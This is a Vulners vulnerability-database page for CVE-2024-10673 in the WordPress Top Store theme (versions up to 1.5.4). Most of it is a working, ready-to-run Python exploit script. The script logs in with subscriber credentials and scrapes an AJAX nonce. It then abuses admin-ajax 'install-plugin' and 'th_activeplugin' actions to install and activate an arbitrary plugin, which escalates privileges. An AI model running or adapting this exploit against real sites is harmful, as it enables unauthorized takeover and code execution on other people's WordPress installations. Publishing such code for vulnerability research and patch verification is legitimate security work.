Vulners
Lucene search
WordPress Top Store Theme 1.5.4 Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2024-10673 | 12 Mar 202506:40 | – | githubexploit |
 | CVE-2024-10673 | 9 Nov 202403:20 | – | circl |
 | WordPress plugin Top Store 安全漏洞 | 9 Nov 202400:00 | – | cnnvd |
 | CVE-2024-10673 | 9 Nov 202403:17 | – | cve |
 | CVE-2024-10673 Top Store <= 1.5.4 - Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation | 9 Nov 202403:17 | – | cvelist |
 | CVE-2024-10673 | 9 Nov 202404:15 | – | nvd |
 | WordPress Top Store Theme 1.5.4 Privilege Escalation | 12 Mar 202500:00 | – | packetstormnews |
 | WordPress Top Store Theme <= 1.5.4 is vulnerable to Arbitrary Code Execution | 8 Nov 202400:00 | – | patchstack |
| WordPress Top Store theme <= 1.5.4 - Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation vulnerability | 8 Nov 202422:40 | – | patchstack |
 | CVE-2024-10673 | 5 Feb 202505:05 | – | redhatcve |
10
import requests
import argparse
import re
import json
# By Nxploit | Khaled Alenazi
def disable_ssl_verification():
requests.packages.urllib3.disable_warnings()
session.verify = False # Ignore SSL verification
def login(url, username, password):
login_url = f"{url}/wp-login.php"
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
response = session.post(login_url, data=login_data, headers=headers, allow_redirects=True)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
return {"status": "success", "message": "Logged in successfully"}
else:
return {"status": "error", "message": "Login failed. Check credentials."}
def fetch_nonce(url):
nonce_page_url = f"{url}/wp-admin/themes.php?page=thunk_started"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
nonce_response = session.get(nonce_page_url, headers=headers)
nonce_match = re.search(r'var _wpUpdatesSettings = {"ajax_nonce":"(.*?)"};', nonce_response.text)
if nonce_match:
return {"status": "success", "message": "Nonce extracted", "nonce": nonce_match.group(1)}
else:
return {"status": "error", "message": "Failed to extract nonce"}
def check_plugin_version(url):
readme_url = f"{url}/wp-content/themes/top-store/readme.txt"
response = session.get(readme_url)
if response.status_code == 200:
version_match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
if version_match:
version = version_match.group(1)
if version <= "1.5.4": # Compare with the vulnerable version
return {"status": "success", "message": f"Vulnerable version detected: {version}"}
else:
return {"status": "info", "message": f"Non-vulnerable version detected: {version}"}
else:
return {"status": "error", "message": "Version information not found in readme.txt"}
else:
return {"status": "error", "message": f"Failed to fetch readme.txt, status code: {response.status_code}"}
def install_plugin(url, plugin_slug, nonce):
admin_ajax_url = f"{url}/wp-admin/admin-ajax.php"
plugin_init = f"{plugin_slug}/{plugin_slug}.php"
install_data = {
"action": "install-plugin",
"slug": plugin_slug,
"init": plugin_init,
"_ajax_nonce": nonce,
"_fs_nonce": "",
"username": "",
"password": "",
"connection_type": "",
"public_key": "",
"private_key": ""
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
install_response = session.post(admin_ajax_url, data=install_data, headers=headers)
if '"success":true' in install_response.text:
return {"status": "success", "message": f"Plugin {plugin_slug} installed successfully"}
else:
return {"status": "error", "message": "Plugin installation failed", "response": install_response.text}
def activate_plugin(url, plugin_slug):
admin_ajax_url = f"{url}/wp-admin/admin-ajax.php"
plugin_init = f"{plugin_slug}/{plugin_slug}.php"
activate_data = {
"action": "th_activeplugin",
"slug": plugin_slug,
"init": plugin_init
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
activate_response = session.post(admin_ajax_url, data=activate_data, headers=headers)
if '"success":true' in activate_response.text:
return {"status": "success", "message": f"Plugin {plugin_slug} activated successfully"}
else:
return {"status": "error", "message": "Plugin activation failed", "response": activate_response.text}
def main():
parser = argparse.ArgumentParser(description="Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi ")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
parser.add_argument("-un", "--username", required=True, help="WordPress Username")
parser.add_argument("-p", "--password", required=True, help="WordPress Password")
parser.add_argument("-pl", "--plugin", default="hunk-companion", help="Plugin slug to install and activate (default: hunk-companion)")
args = parser.parse_args()
disable_ssl_verification()
login_result = login(args.url, args.username, args.password)
print(json.dumps(login_result))
if login_result["status"] != "success":
return
nonce_result = fetch_nonce(args.url)
print(json.dumps(nonce_result))
if nonce_result["status"] != "success":
return
version_result = check_plugin_version(args.url)
print(json.dumps(version_result))
if version_result["status"] != "success":
return
install_result = install_plugin(args.url, args.plugin, nonce_result["nonce"])
print(json.dumps(install_result))
if install_result["status"] != "success":
return
activate_result = activate_plugin(args.url, args.plugin)
print(json.dumps(activate_result))
if activate_result["status"] != "success":
return
print(json.dumps({"status": "success", "message": "Exploit completed successfully!"}))
if __name__ == "__main__":
session = requests.Session()
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.8
EPSS0.51906
SSVC